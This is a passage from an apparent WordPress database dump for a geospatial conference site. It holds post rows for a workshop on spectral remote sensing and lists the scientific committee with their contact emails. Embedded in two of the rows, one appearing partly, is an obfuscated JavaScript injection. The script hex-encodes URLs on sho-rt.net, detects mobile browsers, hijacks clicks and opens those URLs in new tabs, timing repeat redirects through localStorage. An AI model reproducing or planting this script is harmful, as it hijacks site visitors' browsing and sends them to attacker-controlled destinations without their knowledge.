_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Xinlian Liang','','publish','closed','closed','','xinlian-liang','','','2023-02-06 23:28:57','2023-02-06 23:28:57','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3867',0,'dt_team','',0),
(3868,1,'2023-02-06 23:27:23','2023-02-06 23:27:23','','ws283','','inherit','open','closed','','ws283','','','2023-02-06 23:27:23','2023-02-06 23:27:23','',3867,'https://gsw2023.com/wp-content/uploads/2023/02/ws283.jpg',0,'attachment','image/jpeg',0),
(3869,1,'2023-02-06 23:31:57','2023-02-06 23:31:57','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3859\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong></span></h5>\n<p>&nbsp;</p>\n<p><strong>Spectral remote sensing including hyperspectral, multispectral, thermal sensors onboard satellites, aerial, terrestrial and marine acquisition systems, as well as spectral data analytics is an active research topic in Remote Sensing and Computer Vision. This workshop will bring together experts working in cutting-edge spectral remote sensing systems to discuss recent developments in instrumentation, advanced analytics including artificial intelligence, cloud and edge computing methodologies, and future trends in automated information extraction from spectral data. Its fcus is on methodological research. SpACE will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week.</strong></p>\n<p><u> </u>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>CHAIRS</strong></span></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"73\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Spaceborne, airborne, terrestrial, marine and mobile multispectral and hyperspectral sensors and data processing</li>\n<li>Thermal remote sensing</li>\n<li>Radiometric, atmospheric and geometric calibration/corrections of spectral and thermal data.</li>\n<li>Spectral unmixing, denoising, dimensionality reduction and compression of hyperspectral and multispectral data</li>\n<li>Processing and analysis of 1D signals, 2D images, 3D hyperspectral cubes and 4D spectral video datasets</li>\n<li>Fusion and harmonization of spectral/thermal data with other modalities (e.g., Lidar, SAR, Acoustic), a priori information, geospatial and multitemporal data</li>\n<li>AI methods for spectral data analysis and understanding</li>\n<li>Deep learning and explainability for spectral data analysis</li>\n<li>Cloud-based frameworks for spectral data analytics</li>\n<li>Edge-computing methods for efficient spectral data processing</li>\n<li>Analysis and applications based on multi-temporal and multi-sensor data</li>\n<li>Evaluation benchmarks for assessing method performance, robustness, explainability, scalability and generalization</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee </strong></h5>\n<ul>\n<li>Konstantinos Karantzalos (<a href=\"mailto:karank@central.ntua.gr\">karank@central.ntua.gr</a>), WG III/2 Chair</li>\n<li>Daniele Cerra (<a href=\"mailto:Daniele.Cerra@dlr.de\">Cerra@dlr.de</a>), WG I/3 Chair</li>\n<li>Xinlian Liang (<a href=\"mailto:xinlian.liang@whu.edu.cn\">liang@whu.edu.cn</a>), WG II/1 Chair</li>\n<li>Anna Brook (Israel) (<a href=\"mailto:abrook@geo.haifa.ac.il\">abrook@geo.haifa.ac.il</a>), WG III/2</li>\n<li>Jean-Louis Roujean (<a href=\"mailto:jean-louis.roujean@univ-tlse3.fr\">jean-louis.roujean@univ-tlse3.fr</a>) , WG III/2</li>\n<li>Ilkka Pölönen (<a href=\"mailto:ilkka.polonen@jyu.fi\">polonen@jyu.fi</a>) , WG III/2</li>\n<li>Mi Wang (<a href=\"mailto:wangmi@whu.edu.cn\">wangmi@whu.edu.cn</a>), WG I/3</li>\n<li>Jose Marcato Junior (<a href=\"mailto:jose.marcato@ufms.br\">marcato@ufms.br</a>), WG I/3</li>\n<li>Maria Teresa Melis  (<a href=\"mailto:titimelis@unica.it\">titimelis@unica.it</a>), WG II/1</li>\n<li>Weishu Gong (<a href=\"mailto:wsgong@umd.edu\">wsgong@umd.edu</a>), WG II/1</li>\n<li>Martin Mokroš (<a href=\"mailto:mokros@fld.czu.cz\">mokros@fld.czu.cz</a>), WG II/1</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG III/2 Spectral and Thermal Data Processing and Analytics</li>\n<li>WG I/3 Multispectral, Hyperspectral and Thermal Sensors</li>\n<li>WG III/1 Remote Sensing Data Processing and Understanding</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Special Issue dedicated to the workshop:</strong></h5>\n<p>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to an International Journal (tba). The papers being accepted after the peer-review process of the journal will appear in a Special Issue of that journal dedicated to this workshop.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"3861\" img_size=\"1200x1000\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong>','','inherit','closed','closed','','3855-autosave-v1','','','2023-02-06 23:31:57','2023-02-06 23:31:57','',3855,'https://gsw2023.com/?p=3869',0,'revision','',0),
(3870,1,'2023-02-06 23:32:22','2023-02-06 23:32:22','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3859\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong></span></h5>\r\n&nbsp;\r\n\r\n<strong>Spectral remote sensing including hyperspectral, multispectral, thermal sensors onboard satellites, aerial, terrestrial and marine acquisition systems, as well as spectral data analytics is an active research topic in Remote Sensing and Computer Vision. This workshop will bring together experts working in cutting-edge spectral remote sensing systems to discuss recent developments in instrumentation, advanced analytics including artificial intelligence, cloud and edge computing methodologies, and future trends in automated information extraction from spectral data. Its fcus is on methodological research. SpACE will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single track workshop of oral presentations and poster 